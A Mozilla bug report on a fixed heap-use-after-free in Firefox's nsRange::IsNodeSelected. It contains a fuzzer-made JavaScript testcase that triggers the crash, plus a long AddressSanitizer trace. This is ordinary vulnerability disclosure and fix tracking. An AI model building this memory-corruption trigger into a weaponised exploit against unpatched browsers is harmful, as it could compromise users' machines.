Closed Bug 1400179 Opened 8 years ago Closed 8 years ago

heap-use-after-free in nsRange::IsNodeSelected

Categories

(Core :: DOM: Selection, defect)

Product:
Core
Component:
DOM: Selection
Version:
57 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1399091
Milestone:
mozilla58
Tracking Flags:
Tracking Status
thunderbird_esr52 --- unaffected
firefox-esr52 --- unaffected
firefox55 --- unaffected
firefox56 --- unaffected
firefox57 + fixed
firefox58 --- fixed

People

(Reporter: nils, Assigned: bzbarsky)

References

(Depends on 1 open bug)

Details

(4 keywords, Whiteboard: [sec aspect a dupe of 1399091, assertion fixed in 1403145])

Attachments

(3 files)

test.html
27 bytes, text/html
Details
ASAN output
26.26 KB, text/plain
Details
crash.html
1.12 KB, text/html
Details
Attached file test.html
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170914174242). It requires the attached test.html in the same directory and the fuzzPriv extension to reproduce reliably. It sometimes takes a few seconds to crash. <script> function start() { o0=open('test.html','popup52','height=31'); o0.onload=fun0; o2=open('test.html','popup56','innerHeight=40'); o2.onload=fun1; o23=document; setTimeout(fun3, 400); } function fun0(e) { o2=e.target; o11=o0.getSelection(); o16=o2.documentElement; o18=o2.head; o20=document.createRange(); } function fun3() { try{while(document.removeChild(document.firstChild));}catch(e){} o35=document.implementation.createHTMLDocument(); document.appendChild(o35.documentElement); o36=document.createElement('style'); o18.appendChild(o36); o20.selectNodeContents(o45); o36.after("a"); o69=o2.getSelection(); o69.addRange(o20); o20.setEndAfter(o36); document.documentElement.addEventListener('DOMSubtreeModified',fun2); o18.style.display='grid'; o11.addRange(o20); o23.designMode='on'; o11.selectAllChildren(o16); for(var x=0;x<50;x++) eval("o" + x + "=null"); fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();; } function fun1(e) { o38=e.target; o45=o38.getElementsByTagName('*')[2]; } function fun2(){ o38.designMode='on'; } </script> <body onload="start()"></body> ASAN output: ================================================================= ==23032==ERROR: AddressSanitizer: heap-use-after-free on address 0x61000006fe78 at pc 0x7f27cd25fd7a bp 0x7ffddb793cf0 sp 0x7ffddb793ce8 READ of size 1 at 0x61000006fe78 thread T0 (file:// Content) #0 0x7f27cd25fd79 in asT /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:319:12 #1 0x7f27cd25fd79 in getNext /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:206 #2 0x7f27cd25fd79 in getFirst /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:478 #3 0x7f27cd25fd79 in begin /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:539 #4 0x7f27cd25fd79 in nsRange::IsNodeSelected(nsINode*, unsigned int, unsigned int) /builds/worker/workspace/build/src/dom/base/nsRange.cpp:212 #5 0x7f27d1462783 in nsIFrame::IsSelected() const /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:10467:5 #6 0x7f27d16129d2 in nsTextFrame::UnionAdditionalOverflow(nsPresContext*, nsIFrame*, PropertyProvider&, nsRect*, bool) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:5979:8 #7 0x7f27d163afd5 in nsTextFrame::ReflowText(nsLineLayout&, int, mozilla::gfx::DrawTarget*, mozilla::ReflowOutput&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:9824:3 #8 0x7f27d157063c in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /builds/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:924:7 #9 0x7f27d13e0144 in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4218:15 #10 0x7f27d13ded58 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4014:5 #11 0x7f27d13d6819 in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3888:9 #12 0x7f27d13d0418 in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2871:5 #13 0x7f27d13c5f1f in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2407:7 #14 0x7f27d13bccd2 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1233:3 #15 0x7f27d1418e0a in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:932:14 #16 0x7f27d1527705 in MeasuringReflow(nsIFrame*, mozilla::ReflowInput const*, gfxContext*, mozilla::LogicalSize const&, mozilla::LogicalSize const&, int, int) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:3501:11 #17 0x7f27d152aa5e in ContentContribution(nsGridContainerFrame::GridItemInfo const&, nsGridContainerFrame::GridReflowInput const&, gfxContext*, mozilla::WritingMode, mozilla::LogicalAxis, mozilla::Maybe<mozilla::LogicalSize> const&, nsLayoutUtils::IntrinsicISizeType, int, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:3566:12 #18 0x7f27d15263c4 in MinSize(nsGridContainerFrame::GridItemInfo const&, nsGridContainerFrame::GridReflowInput const&, gfxContext*, mozilla::WritingMode, mozilla::LogicalAxis, CachedIntrinsicSizes*) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:3706:23 #19 0x7f27d1524558 in nsGridContainerFrame::Tracks::ResolveIntrinsicSizeStep1(nsGridContainerFrame::GridReflowInput&, nsGridContainerFrame::TrackSizingFunctions const&, int, SizingConstraint, nsGridContainerFrame::LineRange const&, nsGridContainerFrame::GridItemInfo const&) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:3800:11 #20 0x7f27d151e82c in nsGridContainerFrame::Tracks::ResolveIntrinsicSize(nsGridContainerFrame::GridReflowInput&, nsTArray<nsGridContainerFrame::GridItemInfo>&, nsGridContainerFrame::TrackSizingFunctions const&, nsGridContainerFrame::LineRange nsGridContainerFrame::GridArea::*, int, SizingConstraint) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:4198:11 #21 0x7f27d1510cc5 in nsGridContainerFrame::Tracks::CalculateSizes(nsGridContainerFrame::GridReflowInput&, nsTArray<nsGridContainerFrame::GridItemInfo>&, nsGridContainerFrame::TrackSizingFunctions const&, int, nsGridContainerFrame::LineRange nsGridContainerFrame::GridArea::*, SizingConstraint) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:3730:3 #22 0x7f27d1510686 in nsGridContainerFrame::GridReflowInput::CalculateTrackSizes(nsGridContainerFrame::Grid const&, mozilla::LogicalSize&, SizingConstraint) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:2348:9 #23 0x7f27d153691f in nsGridContainerFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:5971:21 #24 0x7f27d13dc0dd in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /builds/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:11 #25 0x7f27d13d25f9 in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3519:11 #26 0x7f27d13d0582 in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2868:5 #27 0x7f27d13c5f1f in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2407:7 #28 0x7f27d13bccd2 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1233:3 #29 0x7f27d1418e0a in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:932:14 #30 0x7f27d14176f6 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:753:5 #31 0x7f27d1418e0a in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:932:14 #32 0x7f27d14d69d8 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:548:3 #33 0x7f27d14d808e in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:660:3 #34 0x7f27d14db239 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1036:3 #35 0x7f27d13a3d23 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:976:14 #36 0x7f27d13a264a in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:332:7 #37 0x7f27d11a4307 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9405:11 #38 0x7f27d11b82c1 in mozilla::PresShell::ProcessReflowCommands(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9578:24 #39 0x7f27d11b7560 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4207:11 #40 0x7f27d112e4c4 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:566:5 #41 0x7f27d112e4c4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1956 #42 0x7f27d113c94b in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:337:13 #43 0x7f27d113c94b in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:307 #44 0x7f27d113c646 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:329:5 #45 0x7f27d113eb9b in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:770:5 #46 0x7f27d113eb9b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:683 #47 0x7f27d113e7a6 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:584:9 #48 0x7f27d1971df2 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:67:16 #49 0x7f27cb7a7721 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20 #50 0x7f27cb3e97de in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1716:28 #51 0x7f27cb334b99 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2119:25 #52 0x7f27cb331974 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2045:17 #53 0x7f27cb333184 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1891:5 #54 0x7f27cb3337d8 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1924:15 #55 0x7f27ca5932bd in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14 #56 0x7f27ca598ff8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:521:10 #57 0x7f27cb33c761 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21 #58 0x7f27cb29e7eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10 #59 0x7f27cb29e7eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319 #60 0x7f27cb29e7eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299 #61 0x7f27d0a4e99f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27 #62 0x7f27d4d90827 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:880:22 #63 0x7f27cb29e7eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10 #64 0x7f27cb29e7eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319 #65 0x7f27cb29e7eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299 #66 0x7f27d4d901da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:705:34 #67 0x4ebe03 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30 #68 0x4ebe03 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:285 #69 0x7f27e7ba382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #70 0x41d758 in _start (/fuzzer3/firefox/firefox+0x41d758) 0x61000006fe78 is located 56 bytes inside of 184-byte region [0x61000006fe40,0x61000006fef8) freed by thread T0 (file:// Content) here: #0 0x4bbc8b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3 #1 0x7f27ca428fd7 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2705:25 #2 0x7f27ca43069b in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2893:3 #3 0x7f27ca43069b in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3909 #4 0x7f27ca42fbb3 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3730:9 #5 0x7f27ca433a00 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4299:21 #6 0x7f27cd20bf8d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1480:3 #7 0x7f27ccd4b46b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1434:3 #8 0x7f27ca5bc191 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129 #9 0x7f27cbd76a50 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12 #10 0x7f27cbd76a50 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315 #11 0x7f27cbd76a50 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282 #12 0x7f27cbd7da1f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:928:12 #13 0x7f27d52758b4 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15 #14 0x7f27d52758b4 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495 #15 0x7f27d525f44f in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12 #16 0x7f27d525f44f in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084 #17 0x7f27d52469db in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12 #18 0x7f27d5275a4c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15 #19 0x7f27d52763a2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10 #20 0x7f27d5cca8e3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2906:12 #21 0x7f27cbc94d3b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18 #22 0x7f27d52758b4 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15 #23 0x7f27d52758b4 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495 #24 0x7f27d54aa1ec in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2589:14 #25 0x3ab1f7a93306 (<unknown module>) #26 0x62100091b067 (<unknown module>) #27 0x3ab1f7a878a9 (<unknown module>) #28 0x7f27d54d7782 in EnterBaseline(JSContext*, js::jit::EnterJitData&) /builds/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:160:9 #29 0x7f27d54d88ec in js::jit::EnterBaselineAtBranch(JSContext*, js::InterpreterFrame*, unsigned char*) /builds/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:268:28 #30 0x7f27d5268b32 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2040:28 #31 0x7f27d52469db in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12 #32 0x7f27d5275a4c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15 #33 0x7f27d52763a2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10 #34 0x7f27d5ccc76b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2965:12 #35 0x7f27ce7a8e09 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8 previously allocated by thread T0 (file:// Content) here: #0 0x4bbfdc in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3 #1 0x4ed4fd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17 #2 0x7f27cd116e6d in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12 #3 0x7f27cd116e6d in nsIDocument::CreateRange(mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7034 #4 0x7f27ce69ba83 in mozilla::dom::DocumentBinding::createRange(JSContext*, JS::Handle<JSObject*>, nsIDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1500:45 #5 0x7f27cec20020 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3055:13 #6 0x7f27d52758b4 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15 #7 0x7f27d52758b4 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495 #8 0x7f27d525f44f in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12 #9 0x7f27d525f44f in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084 #10 0x7f27d52469db in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12 #11 0x7f27d5275a4c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15 #12 0x7f27d52763a2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10 #13 0x7f27d5f7fe2e in js::ForwardingProxyHandler::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:175:12 #14 0x7f27d5f428d9 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23 #15 0x7f27d5f5fe83 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:497:21 #16 0x7f27d5f62847 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:757:12 #17 0x7f27d5275cfc in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15 #18 0x7f27d5275cfc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477 #19 0x7f27d52763a2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10 #20 0x7f27d5ccc76b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2965:12 #21 0x7f27ce654e05 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37 #22 0x7f27cf0269f5 in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12 #23 0x7f27cf0269f5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215 #24 0x7f27cefeffc9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1112:51 #25 0x7f27ceff2090 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1283:20 #26 0x7f27cefd1e81 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16 #27 0x7f27cefd5352 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9 #28 0x7f27d129855e in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1081:7 #29 0x7f27d4242991 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7741:21 #30 0x7f27d423e9b4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7539:7 #31 0x7f27d424635f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7436:13 #32 0x7f27cbf5f4f0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1320:3 #33 0x7f27cbf5e5ac in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:861:14 #34 0x7f27cbf5b566 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:750:9 SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:319:12 in asT Shadow bytes around the buggy address: 0x0c2080005f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2080005f80: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c2080005f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2080005fa0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c2080005fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2080005fc0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd[fd] 0x0c2080005fd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa 0x0c2080005fe0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c2080005ff0: 00 